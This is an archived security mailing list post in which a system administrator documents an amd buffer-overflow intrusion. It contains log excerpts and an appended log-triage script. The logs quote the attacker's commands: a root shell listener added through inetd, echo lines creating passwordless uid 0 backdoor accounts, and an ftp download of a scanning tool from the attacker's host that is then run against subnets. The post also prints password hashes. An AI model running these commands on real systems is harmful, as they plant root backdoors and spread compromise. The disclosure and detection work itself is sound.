Security Incidents mailing list archives
Re: Attacks from cr595282-a.hnsn1.on.wave.home.com [24.112.41.167]
From: truth () ICHAOS COM (Thomas E. Ruth)
Date: Fri, 7 Jan 2000 14:20:25 -0700
I just learned that the other IP that appears in the logs (from psi.net) is the account the cracker uses when he doesn't use his cablemodem.

Thomas Ruth
UNIX System Administrator
Qwest Communications

"Thomas E. Ruth" wrote:

The attacker from this IP address is using an RPC scanner to search for versions of amd that have a buffer overflow, and exploiting it. They are then using the exploited systems to scan other subnets and exploit those systems, etc. etc. etc. My system was used as one of these launch points to get in to at least 2 other systems, one of which got destroyed. User is known to be found on irc.efnet.org using the alias "dap" and hangs out on #bifemunix frequently.

Here are some log files of the incident:

One of the affected systems:

messages.1

Dec 29 22:52:01 zenith
Dec 29 22:52:01 zenith syslogd: Cannot glue message parts together
Dec 29 22:52:01 zenith 27>Dec 29 22:52:01 amd[462]: amq requested mount of null)/0)
Dec 29 22:52:01 zenith p/h;/usr/sbin/inetd /tmp/h &#
Dec 29 22:52:03 zenith PAM_pwdb[32202]: (su) session closed for user root
Dec 29 22:52:04 zenith PAM_pwdb[32315]: (su) session closed for user root
Dec 29 22:53:55 zenith PAM_pwdb[23940]: password for (dap/69) changed by ((null)/0)
Dec 29 22:54:02 zenith PAM_pwdb[23941]: password for (dapper/0) changed by ((null)/0)
Dec 29 23:14:35 zenith PAM_pwdb[24143]: password for (joe/23) changed by ((null)/0)
Dec 29 23:15:04 zenith PAM_pwdb[24148]: password for (black/0) changed by ((null)/0)
Dec 29 23:18:28 zenith PAM_pwdb[24174]: (login) session opened for user joe by (uid=0)
Dec 29 23:19:22 zenith PAM_pwdb[24174]: (login) session closed for user joe
Dec 29 23:28:41 zenith PAM_pwdb[24250]: password for (black/0) changed by ((null)/0)
Dec 29 23:29:06 zenith PAM_pwdb[24257]: password for (black/0) changed by ((null)/0)
Dec 29 23:29:52 zenith PAM_pwdb[24264]: (login) session opened for user joe by (uid=0)
Dec 29 23:30:05 zenith PAM_pwdb[24264]: (login) session closed for user joe
Dec 29 23:32:05 zenith PAM_pwdb[24295]: password for (joe/23) changed by ((null)/0)
Dec 29 23:32:30 zenith PAM_pwdb[24298]: password for (black/0) changed by ((null)/0)
Jan 1 07:42:16 zenith PAM_pwdb[12480]: (login) session opened for user dap by (uid=0)
Jan 1 07:42:20 zenith PAM_pwdb[12492]: (su) session opened for user dapper by dap(uid=69)
Jan 1 07:43:43 zenith modprobe: can't locate module binfmt-0008
Jan 1 07:43:43 zenith modprobe: can't locate module binfmt-0008
Jan 1 07:47:19 zenith PAM_pwdb[12492]: (su) session closed for user dapper
Jan 1 07:47:20 zenith PAM_pwdb[12480]: (login) session closed for user dap

Dec 29 23:16:17 zenith in.telnetd[24159]: connect from 63.225.116.129
Dec 29 23:18:16 zenith in.telnetd[24171]: connect from 63.225.116.129
Dec 29 23:18:28 zenith login: LOGIN ON 4 BY joe FROM mail.multifin.com
Dec 29 23:29:42 zenith in.telnetd[24263]: connect from 63.225.116.129
Dec 29 23:29:52 zenith login: LOGIN ON 4 BY joe FROM mail.multifin.com
Jan 1 07:42:10 zenith in.telnetd[12479]: connect from 24.112.41.167
Jan 1 07:42:16 zenith login: LOGIN ON 7 BY dap FROM cr595282-a.hnsn1.on.wave.home.com
Jan 1 07:46:45 zenith in.telnetd[12576]: connect from 127.0.0.1
Jan 1 07:47:20 zenith pam_console[12480]: getpwnam failed for dap

.root_bash_history - the commands he/she used

uname -a; pwd; echo "dap::69:100::/tmp:/bin/sh" >> /etc/passwd; echo "dap::::::::" >> /etc/shadow; echo "dapper::0:0::/tmp:/bin/sh" >> /etc/passwd; echo "dapper::::::::" >> /etc/shadow; passwd dap
passwd dapper
exit
uname -a; pwd; echo "joe::23:100:black,,,:/:/bin/sh" >> /etc/passwd; echo "joe::::::::" >> /etc/shadow; passwd joe
echo "black::0:0::/:/bin/sh" >> /etc/passwd; echo "black::::::::" >> /etc/shadow; passwd black
exit
uname -a; pwd; echo "joe::23:100:black,,,:/:/bin/sh" >> /etc/passwd; echo "joe::::::::" >> /etc/shadow; passwd black
echo "black::0:0::/:/bin/sh" >> /etc/passwd; echo "black::::::::" >> /etc/shadow; passwd black
ls
exit
uname -a; pwd; echo "joe::23:100:black,,,:/:/bin/sh" >> /etc/passwd; echo "joe::::::::" >> /etc/shadow; passwd joe
echo "black::0:0::/:/bin/sh" >> /etc/passwd; echo "black::::::::" >> /etc/shadow; passwd black
exit
uname -a; pwd; cat /etc/passwd |grep dap
exit; uname -a; pwd; cat /etc/passwd |grep dap
exit
uname -a; pwd; exit
uname -a; pwd; exit
uname -a; pwd; cat /etc/passwd |grep dap
cat /etc/passwd |grep joe
cd /home/
ls
cd /home/
ls
cd kate
ls
cd ..
cd todd
ls
cd ..
ls
cd pager
ls
cd ..
ls
cd tmc
ls
cd ..
cd
ls
ls
cd kate
ls
f
ls
id
uname -a
exit; cd /tmp
(jan 1st ish)
cd /usr/.../
mkdir /usr/.../
cd /usr/.../
ls
ftp 24.112.41.167
ls
tar -zxvf 4mdsk4n-v0.1.tar.gz
mv 4mdsk4n-v0.1/ amdscan/
ls
rm *.gz
cd amdscan
ls
mv 4mdsk4n-i386-linux amds
chmod +x amds
./amds
ls
ls
./amds -o outfile 207.168
./amds -o outfile 207.167
exit

CRACKER'S ADDITION TO MY PASSWORD FILE

dap:$1$Rv.2Td1q$DQLXDhxAa9MP17qs.joiD/:10955:-1:-1:-1:-1:-1:134538300
dapper:$1$b2.QOLS2$un.hyVhpSuh9kMt/yr6mT1:10955:-1:-1:-1:-1:-1:134538300
joe:!$1$u7vD0D0N$FJU5Wpla7lQYbRMzdkBWp.:10955:-1:-1:-1:-1:-1:134530828
black:!$1$yugI3kQm$ydXiz5i7CkXSjTc/1a46F0:10955:-1:-1:-1:-1:-1:134530828
joe::::::::
black::::::::
joe::::::::
black::::::::

--------------------------------------------------------------------

Another affected system:

Subject: lastlog

dap pts/7 Thu Dec 30 21:20 - 21:49 (00:29) cr595282-a.hnsn1.on.wave.home.com
issp pts/7 Thu Dec 30 20:16 - 21:15 (00:59) ip85.toronto25.dialup.canada.psi.net
issp pts/9 Thu Dec 30 19:58 - 21:48 (01:49) ip222.toronto6.dialup.canada.psi.net
issp pts/7 Thu Dec 30 19:48 - 20:11 (00:22) ip222.toronto6.dialup.canada.psi.net
issp pts/7 Thu Dec 30 16:08 - 16:08 (00:00) ip213.toronto6.dialup.canada.psi.net
issp pts/7 Thu Dec 30 15:42 - 15:57 (00:14) ip213.toronto6.dialup.canada.psi.net
issp pts/7 Thu Dec 30 12:13 - 14:51 (02:37) ip213.toronto6.dialup.canada.psi.net
issp pts/4 Thu Dec 30 11:56 - 16:07 (04:11) ip213.toronto6.dialup.canada.psi.net
issp pts/7 Wed Dec 29 21:59 - 23:21 (01:21) ip51.toronto27.dialup.canada.psi.net
issp ftp Wed Dec 29 21:38 - 21:53 (00:15) ip51.toronto27.dialup.canada.psi.net
issp pts/4 Wed Dec 29 21:35 - 23:21 (01:46) ip51.toronto27.dialup.canada.psi.net
dap pts/12 Tue Dec 28 01:25 - 01:28 (00:02) sponge.gaffa.com
issp pts/12 Mon Dec 27 18:45 - 18:47 (00:01) ip216.toronto8.dialup.canada.psi.net
dap pts/12 Mon Dec 27 16:16 - 16:19 (00:02) cr595282-a.hnsn1.on.wave.home.com
joe pts/12 Mon Dec 27 16:09 - 16:16 (00:07) cr595282-a.hnsn1.on.wave.home.com
joe pts/11 Mon Dec 27 16:09 - 16:09 (00:00) cr595282-a.hnsn1.on.wave.home.com
joe pts/11 Mon Dec 27 15:48 - 15:51 (00:03) ip107.toronto6.dialup.canada.psi.net
joe pts/11 Mon Dec 27 15:47 - 15:47 (00:00) freaker.gaffa.com

messages:

Dec 27 15:44:16 happy
Dec 27 15:44:16 happy syslogd: Cannot glue message parts together
Dec 27 15:44:16 happy 27>Dec 27 15:44:16 amd[594]: amq requested mount of [...]18 Jan 1998--str/bin/sh(-c)/bin/echo! '2222 stream tcp nowait root /bin/sh s
Dec 27 15:44:16 happy p/h;/usr/sbin/inetd /tmp/h &#?Òòÿ¿Òòÿ¿^C
Dec 27 15:45:08 happy PAM_pwdb[16359]: password for (joe/23) changed by ((null)/0)
Dec 27 15:45:45 happy PAM_pwdb[16362]: password for (black/0) changed by ((null)/0)
Dec 27 15:47:01 happy PAM_pwdb[16370]: (login) session opened for user joe by (uid=0)
Dec 27 15:47:10 happy PAM_pwdb[16384]: (su) session opened for user black by joe(uid=23)
Dec 27 15:47:24 happy PAM_pwdb[16384]: (su) session closed for user black
Dec 27 15:47:26 happy PAM_pwdb[16370]: (login) session closed for user joe
Dec 27 15:48:09 happy PAM_pwdb[16392]: check pass; user unknown
Dec 27 15:48:09 happy login[16392]: FAILED LOGIN 1 FROM ip107.toronto6.dialup.canada.psi.net FOR hd, User not known to the underlying authentication module
Dec 27 15:48:12 happy PAM_pwdb[16392]: (login) session opened for user joe by (uid=0)
Dec 27 15:48:49 happy PAM_pwdb[16407]: 1 authentication failure; joe(uid=23) -> sblanchard for su service
Dec 27 15:48:54 happy PAM_pwdb[16408]: (su) session opened for user black by joe(uid=23)
Dec 27 15:51:23 happy PAM_pwdb[16408]: (su) session closed for user black
Dec 27 15:51:25 happy PAM_pwdb[16392]: (login) session closed for user joe
Dec 27 16:09:08 happy PAM_pwdb[16498]: (login) session opened for user joe by (uid=0)
Dec 27 16:09:16 happy kernel: nfs: server pid594@happy:/net not responding, still trying
Dec 27 16:09:31 happy PAM_pwdb[16518]: (login) session opened for user joe by (uid=0)
Dec 27 16:09:52 happy PAM_pwdb[16537]: (su) session opened for user black by joe(uid=23)
Dec 27 16:10:08 happy PAM_pwdb[16539]: password for (joe/23) changed by (joe/0)
Dec 27 16:10:23 happy PAM_pwdb[16550]: password for (black/0) changed by (joe/0)
Dec 27 16:16:26 happy PAM_pwdb[16563]: password for (dap/69) changed by (joe/0)
Dec 27 16:16:40 happy PAM_pwdb[16564]: password for (dapper/0) changed by (joe/0)
Dec 27 16:16:52 happy PAM_pwdb[16537]: (su) session closed for user black
Dec 27 16:16:53 happy PAM_pwdb[16518]: (login) session closed for user joe
Dec 27 16:16:57 happy PAM_pwdb[16567]: (login) session opened for user dap by (uid=0)
Dec 27 16:17:15 happy PAM_pwdb[16582]: (su) session opened for user dapper by dap(uid=69)
Dec 27 16:19:17 happy PAM_pwdb[16582]: (su) session closed for user dapper
Dec 27 16:19:18 happy PAM_pwdb[16567]: (login) session closed for user dap
Dec 27 17:04:07 happy PAM_pwdb[15181]: (su) session closed for user root
Dec 27 17:07:33 happy PAM_pwdb[16765]: (su) session opened for user root by truth(uid=500)
Dec 27 17:34:36 happy login: FAILED LOGIN 1 FROM ip216.toronto8.dialup.canada.psi.net FOR joe, Authentication failure
Dec 27 18:40:02 happy login: FAILED LOGIN 1 FROM supper.ma.ultranet.com FOR joe, Authentication failure
Dec 27 18:41:14 happy PAM_pwdb[17069]: password for (issp/56) changed by ((null)/0)
Dec 27 18:45:14 happy PAM_pwdb[17075]: (login) session opened for user issp by (uid=0)
Dec 27 18:45:27 happy PAM_pwdb[17089]: get passwd; pwdb: structure is no longer valid
Dec 27 18:46:57 happy PAM_pwdb[17093]: password for (tssp/0) changed by ((null)/0)
Dec 27 18:47:06 happy PAM_pwdb[17094]: (su) session opened for user tssp by issp(uid=56)
Dec 27 18:47:11 happy PAM_pwdb[17094]: (su) session closed for user tssp
Dec 27 18:47:13 happy PAM_pwdb[17075]: (login) session closed for user issp
Dec 28 01:25:51 happy PAM_pwdb[17751]: (login) session opened for user dap by (uid=0)
Dec 28 01:28:37 happy PAM_pwdb[17751]: (login) session closed for user dap
Dec 28 04:02:13 happy kernel: nfs: task 1527 can't get a request slot
Dec 28 09:00:00 happy last message repeated 8 times
Dec 28 11:40:04 happy last message repeated 8 times
Dec 28 11:50:30 happy last message repeated 8 times
Dec 28 13:00:01 happy last message repeated 8 times
Dec 28 14:00:00 happy last message repeated 8 times
Dec 28 14:10:00 happy last message repeated 2 times
Dec 28 14:10:04 happy last message repeated 4 times
Dec 28 15:38:26 happy PAM_pwdb[21366]: (login) session opened for user truth by (uid=0)
Dec 28 15:50:57 happy PAM_pwdb[21366]: (login) session closed for user truth
Dec 28 17:18:11 happy PAM_pwdb[15434]: (su) session closed for user root
Dec 28 17:25:31 happy PAM_pwdb[16765]: (su) session closed for user root
Dec 29 04:02:13 happy kernel: nfs: task 1528 can't get a request slot
Dec 29 14:10:11 happy amd[25978]: AM-UTILS VERSION INFORMATION:
Dec 29 14:10:11 happy amd[25978]: Copyright (c) 1997-1998 Erez Zadok
Dec 29 14:10:11 happy amd[25978]: Copyright (c) 1990 Jan-Simon Pendry
Dec 29 14:10:11 happy amd[25978]: Copyright (c) 1990 Imperial College of Science, Technology & Medicine
Dec 29 14:10:11 happy amd[25978]: Copyright (c) 1990 The Regents of the University of California.
Dec 29 14:10:11 happy amd[25978]: am-utils version 6.0 (build 1).
Dec 29 14:10:11 happy amd[25978]: Built by root () porky devel redhat com on date Thu Apr 8 13:25:28 EDT 1999.
Dec 29 14:10:11 happy amd[25978]: cpu=i686 (little-endian), arch=i386, karch=i686.
Dec 29 14:10:11 happy amd[25978]: full_os=linux, os=linux, osver=2.2.1-ac1, vendor=pc.
Dec 29 14:10:11 happy amd[25978]: Map support for: root, passwd, union, nisplus, nis, ndbm, file, error.
Dec 29 14:10:11 happy amd[25978]: AMFS: nfs, link, nfsx, nfsl, host, linkx, program, union, inherit,
Dec 29 14:10:11 happy amd[25978]: ufs, cdfs, pcfs, auto, direct, toplvl, autofs, error.
Dec 29 14:10:11 happy amd[25978]: FS: autofs, isofs, nfs, vfat, ext2.
Dec 29 14:10:11 happy amd[25978]: Network 1: wire="10.161.251.0" (netnumber=10.161.251).
Dec 29 14:10:11 happy amd[25978]: Network 2: wire="197.100.100.0" (netnumber=197.100.100).
Dec 29 14:10:11 happy amd[25978]: Network 3: wire="206.60.125.0" (netnumber=206.60.125).
Dec 29 14:10:11 happy amd[25978]: Network 4: wire="10.161.251.0" (netnumber=10.161.251).
Dec 29 14:10:11 happy amd[25978]: Network 5: wire="10.161.251.0" (netnumber=10.161.251).
Dec 29 14:10:11 happy amd[25978]: Network 6: wire="63.225.116.128" (netnumber=63.225.116.128).
Dec 29 14:10:11 happy amd[25978]: My ip addr is 0xaa1fb14
Dec 29 14:10:11 happy amd[25979]: released controlling tty using setsid()
Dec 29 14:10:11 happy amd[25979]: creating autofs service listener
Dec 29 14:10:11 happy amd[25979]: file server localhost type local starts up
Dec 29 14:10:11 happy amd: amd startup succeeded
Dec 29 14:10:23 happy kernel: nfs: task 1529 can't get a request slot
Dec 29 21:35:14 happy PAM_pwdb[27643]: (login) session opened for user issp by (uid=0)
Dec 29 21:35:21 happy PAM_pwdb[27657]: (su) session opened for user tssp by issp(uid=56)
Dec 29 21:38:04 happy ftpd[27664]: FTP LOGIN FROM ip51.toronto27.dialup.canada.psi.net [154.11.84.51], issp
Dec 29 21:38:17 happy kernel: nfs: task 1530 can't get a request slot
Dec 29 21:53:08 happy ftpd[27664]: FTP session closed
Dec 29 21:54:59 happy kernel: sscan uses obsolete (PF_INET,SOCK_PACKET)
Dec 29 21:54:59 happy modprobe: can't locate module `úÿ¿à
Dec 29 21:54:59 happy modprobe: can't locate module ?úÿ¿à
Dec 29 21:55:12 happy modprobe: can't locate module `úÿ¿à
Dec 29 21:55:12 happy modprobe: can't locate module ?úÿ¿à
Dec 29 21:55:34 happy modprobe: can't locate module `úÿ¿à
Dec 29 21:55:34 happy modprobe: can't locate module ?úÿ¿à
Dec 29 21:55:51 happy modprobe: can't locate module `úÿ¿à
Dec 29 21:55:51 happy modprobe: can't locate module ?úÿ¿à
Dec 29 21:59:43 happy login: FAILED LOGIN 1 FROM ip51.toronto27.dialup.canada.psi.net FOR joe, Authentication failure
Dec 29 21:59:46 happy PAM_pwdb[27931]: (login) session opened for user issp by (uid=0)
Dec 29 21:59:49 happy PAM_pwdb[27961]: (su) session opened for user tssp by issp(uid=56)
Dec 29 23:21:13 happy PAM_pwdb[27961]: (su) session closed for user tssp
Dec 29 23:21:15 happy PAM_pwdb[27931]: (login) session closed for user issp
Dec 29 23:21:15 happy PAM_pwdb[27931]: 1 authentication failure; (uid=0) -> joe for login service
Dec 29 23:21:54 happy PAM_pwdb[27657]: (su) session closed for user tssp
Dec 29 23:21:55 happy PAM_pwdb[27643]: (login) session closed for user issp
Dec 30 04:02:13 happy kernel: nfs: task 1531 can't get a request slot
Dec 30 08:10:06 happy last message repeated 3 times
Dec 30 11:10:01 happy last message repeated 2 times
Dec 30 11:56:24 happy login: FAILED LOGIN 1 FROM ip213.toronto6.dialup.canada.psi.net FOR joe, Authentication failure
Dec 30 11:56:26 happy PAM_pwdb[31581]: (login) session opened for user issp by (uid=0)
Dec 30 11:56:33 happy PAM_pwdb[31595]: (su) session opened for user tssp by issp(uid=56)
Dec 30 12:13:52 happy PAM_pwdb[31745]: (login) session opened for user issp by (uid=0)
Dec 30 12:13:59 happy PAM_pwdb[31834]: (su) session opened for user tssp by issp(uid=56)
Dec 30 14:00:01 happy last message repeated 2 times
Dec 30 14:51:37 happy PAM_pwdb[31834]: (su) session closed for user tssp
Dec 30 14:51:39 happy PAM_pwdb[31745]: (login) session closed for user issp
Dec 30 15:42:47 happy PAM_pwdb[10377]: (login) session opened for user issp by (uid=0)
Dec 30 15:43:05 happy PAM_pwdb[10394]: (su) session opened for user tssp by issp(uid=56)
Dec 30 15:57:06 happy PAM_pwdb[10394]: (su) session closed for user tssp
Dec 30 15:57:12 happy PAM_pwdb[10377]: (login) session closed for user issp
Dec 30 16:04:34 happy PAM_pwdb[31595]: (su) session closed for user tssp
Dec 30 16:05:10 happy PAM_pwdb[10541]: (su) session opened for user tssp by issp(uid=56)
Dec 30 16:08:08 happy kernel: nfs: task 1532 can't get a request slot
Dec 30 16:08:41 happy PAM_pwdb[10549]: (login) session opened for user issp by (uid=0)
Dec 30 19:48:19 happy login: FAILED LOGIN 1 FROM ip222.toronto6.dialup.canada.psi.net FOR joe, Authentication failure
Dec 30 19:48:24 happy PAM_pwdb[11145]: (login) session opened for user issp by (uid=0)
Dec 30 19:49:15 happy PAM_pwdb[11162]: (su) session opened for user tssp by issp(uid=56)
Dec 30 19:58:37 happy PAM_pwdb[11197]: (login) session opened for user issp by (uid=0)
Dec 30 19:58:41 happy PAM_pwdb[11317]: (su) session opened for user tssp by issp(uid=56)
Dec 30 20:11:12 happy PAM_pwdb[11162]: (su) session closed for user tssp
Dec 30 20:16:11 happy PAM_pwdb[14202]: (login) session opened for user issp by (uid=0)
Dec 30 20:16:15 happy PAM_pwdb[14216]: (su) session opened for user tssp by issp(uid=56)
Dec 30 21:04:15 happy telnetd[14366]: ttloop: peer died: Invalid or incomplete multibyte or wide character
Dec 30 21:15:26 happy PAM_pwdb[14216]: (su) session closed for user tssp
Dec 30 21:15:28 happy PAM_pwdb[14202]: (login) session closed for user issp
Dec 30 21:20:03 happy PAM_pwdb[14432]: (login) session opened for user dap by (uid=0)
Dec 30 21:22:09 happy PAM_pwdb[14520]: (su) session opened for user dapper by dap(uid=69)
Dec 30 21:27:15 happy PAM_pwdb[14546]: (su) session opened for user tssp by dap(uid=0)
Dec 30 21:48:31 happy PAM_pwdb[11317]: (su) session closed for user tssp
Dec 31 04:02:13 happy kernel: nfs: task 1533 can't get a request slot
Dec 31 10:07:27 happy last message repeated 17 times
Dec 31 12:24:19 happy kernel: nfs: RPC call returned error 111
Dec 31 12:24:19 happy kernel: RPC: task of released request still queued!
Dec 31 12:24:19 happy kernel: RPC: (task is on xprt_pending)
Dec 31 12:24:19 happy kernel: nfs_revalidate_inode: /// getattr failed, ino=3, error=-111
Dec 31 12:24:20 happy kernel: nfs: RPC call returned error 111
Dec 31 12:24:20 happy kernel: RPC: task of released request still queued!
Dec 31 12:24:20 happy kernel: RPC: (task is on xprt_pending)
Dec 31 12:24:20 happy kernel: nfs_revalidate_inode: /// getattr failed, ino=3, error=-111
Dec 31 12:24:20 happy kernel: nfs: RPC call returned error 111
Dec 31 12:24:20 happy kernel: RPC: task of released request still queued!
Dec 31 12:24:20 happy kernel: RPC: (task is on xprt_pending)
Dec 31 12:24:20 happy kernel: nfs_revalidate_inode: /// getattr failed, ino=3, error=-111
Dec 31 12:24:21 happy amd[25979]: /net: mount (amfs_auto_cont): Connection refused
Dec 31 12:24:21 happy kernel: nfs: RPC call returned error 111
Dec 31 12:24:21 happy kernel: RPC: task of released request still queued!
Dec 31 12:24:21 happy kernel: RPC: (task is on xprt_pending)
Dec 31 12:24:21 happy kernel: nfs_revalidate_inode: /// getattr failed, ino=3, error=-111
Dec 31 12:24:22 happy kernel: nfs: RPC call returned error 111
Dec 31 12:24:22 happy kernel: RPC: task of released request still queued!
Dec 31 12:24:22 happy kernel: RPC: (task is on xprt_pending)
Dec 31 12:24:22 happy kernel: nfs_revalidate_inode: /// getattr failed, ino=3, error=-111
Dec 31 12:24:23 happy kernel: nfs: RPC call returned error 111
Dec 31 12:24:23 happy kernel: RPC: task of released request still queued!
Dec 31 12:24:23 happy kernel: RPC: (task is on xprt_pending)
Dec 31 12:24:23 happy kernel: nfs_revalidate_inode: /// getattr failed, ino=3, error=-111
Dec 31 12:24:24 happy kernel: nfs: RPC call returned error 111
Dec 31 12:24:24 happy kernel: RPC: task of released request still queued!
Dec 31 12:24:24 happy kernel: RPC: (task is on xprt_pending)
Dec 31 12:24:24 happy kernel: nfs_revalidate_inode: /// getattr failed, ino=3, error=-111
Dec 31 12:24:25 happy kernel: nfs: RPC call returned error 111
Dec 31 12:24:25 happy kernel: RPC: task of released request still queued!
Dec 31 12:24:25 happy kernel: RPC: (task is on xprt_pending)
Dec 31 12:24:25 happy kernel: nfs_revalidate_inode: /// getattr failed, ino=3, error=-111
Dec 31 12:24:26 happy kernel: nfs: RPC call returned error 111
Dec 31 12:24:26 happy kernel: RPC: task of released request still queued!
Dec 31 12:24:26 happy kernel: RPC: (task is on xprt_pending)
Dec 31 12:24:26 happy kernel: nfs_revalidate_inode: /// getattr failed, ino=3, error=-111
Dec 31 12:26:40 happy kernel: nfs: RPC call returned error 111
Dec 31 12:26:40 happy kernel: RPC: task of released request still queued!
Dec 31 12:26:40 happy kernel: RPC: (task is on xprt_pending)
Dec 31 12:26:40 happy kernel: nfs_revalidate_inode: /// getattr failed, ino=3, error=-111
Dec 31 12:26:40 happy kernel: nfs: RPC call returned error 111
Dec 31 12:26:40 happy kernel: RPC: task of released request still queued!
Dec 31 12:26:40 happy kernel: RPC: (task is on xprt_pending)
Dec 31 12:26:40 happy kernel: nfs_revalidate_inode: /// getattr failed, ino=3, error=-111
Dec 31 12:26:41 happy kernel: nfs: RPC call returned error 111
Dec 31 12:26:41 happy kernel: RPC: task of released request still queued!
Dec 31 12:26:41 happy kernel: RPC: (task is on xprt_pending)
Dec 31 12:26:41 happy kernel: nfs_revalidate_inode: /// getattr failed, ino=3, error=-111
Dec 31 12:26:42 happy kernel: nfs: RPC call returned error 111
Dec 31 12:26:42 happy kernel: RPC: task of released request still queued!
Dec 31 12:26:42 happy kernel: RPC: (task is on xprt_pending)
Dec 31 12:26:42 happy kernel: nfs_revalidate_inode: /// getattr failed, ino=3, error=-111
Dec 31 12:41:42 happy kernel: nfs: RPC call returned error 111
Dec 31 12:41:42 happy kernel: RPC: task of released request still queued!
Dec 31 12:41:42 happy kernel: RPC: (task is on xprt_pending)
Dec 31 12:41:42 happy kernel: nfs_revalidate_inode: /// getattr failed, ino=3, error=-111
Dec 31 13:42:02 happy kernel: nfs: RPC call returned error 111
Dec 31 13:42:02 happy kernel: RPC: task of released request still queued!
Dec 31 13:42:02 happy kernel: RPC: (task is on xprt_pending)
Dec 31 13:42:02 happy kernel: nfs_revalidate_inode: /// getattr failed, ino=3, error=-111

-------------------------------------------------------------------

Patch your AMD's!!

Thomas Ruth
UNIX System Administrator
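
Added example, not part of the original post: a small triage scanner for syslog excerpts like the ones above, flagging an oversized `amq requested mount of` argument, passwords set on non-root uid 0 accounts, and later `su` sessions into those accounts. The rule names, the `MAX_MOUNT_ARG` threshold and the reading of `(null)` as "caller had no login name" are assumptions; the sample lines are copied from the post except the amd line, whose argument is a constructed run of `?`.

```python
import re

# Patterns for the three log shapes that appear in the post's syslog excerpts.
AMQ = re.compile(r"amd\[\d+\]: amq requested mount of (.*)$")
PWCHG = re.compile(r"password for \((\S+?)/(\d+)\) changed by \((.+)/(\d+)\)")
SU = re.compile(r"\(su\) session opened for user (\S+) by (\S*)\(uid=(\d+)\)")

# Assumption: no legitimate amq mount request names a path this long.
MAX_MOUNT_ARG = 256


def scan(lines, max_arg_len=MAX_MOUNT_ARG):
    """Return (line_number, rule, detail) tuples for suspicious entries."""
    findings = []
    rogue_root = set()  # non-root account names seen with uid 0
    for n, line in enumerate(lines, 1):
        m = AMQ.search(line)
        if m:
            arg = m.group(1)
            # Overflow attempts show up as a huge or non-printable mount name.
            if len(arg) > max_arg_len or not arg.isprintable():
                findings.append((n, "amq-oversized-mount", f"{len(arg)} characters"))
            continue
        m = PWCHG.search(line)
        if m:
            user, uid, actor = m.group(1), int(m.group(2)), m.group(3)
            if uid == 0 and user != "root":
                # A second uid 0 account is a backdoor regardless of who set it.
                rogue_root.add(user)
                findings.append((n, "uid0-account-password-set", user))
            elif actor == "(null)":
                # Assumed meaning: root process with no login name (no tty login).
                findings.append((n, "password-set-without-login-name", user))
            continue
        m = SU.search(line)
        if m and m.group(1) in rogue_root:
            findings.append((n, "su-to-rogue-uid0", f"{m.group(2)} -> {m.group(1)}"))
    return findings


# Sample input: lines from the post; the amd argument is constructed.
SAMPLE_LOG = [
    "Dec 27 15:44:16 happy 27>Dec 27 15:44:16 amd[594]: amq requested mount of " + "?" * 600,
    "Dec 27 15:45:08 happy PAM_pwdb[16359]: password for (joe/23) changed by ((null)/0)",
    "Dec 27 15:45:45 happy PAM_pwdb[16362]: password for (black/0) changed by ((null)/0)",
    "Dec 27 15:47:01 happy PAM_pwdb[16370]: (login) session opened for user joe by (uid=0)",
    "Dec 27 15:47:10 happy PAM_pwdb[16384]: (su) session opened for user black by joe(uid=23)",
    "Dec 27 17:07:33 happy PAM_pwdb[16765]: (su) session opened for user root by truth(uid=500)",
    "Dec 29 14:10:11 happy amd[25979]: file server localhost type local starts up",
]

if __name__ == "__main__":
    for lineno, rule, detail in scan(SAMPLE_LOG):
        print(f"line {lineno}: {rule}: {detail}")
```

The administrator's own `su` to root and the normal amd startup line produce no findings, so the output is limited to the intrusion chain.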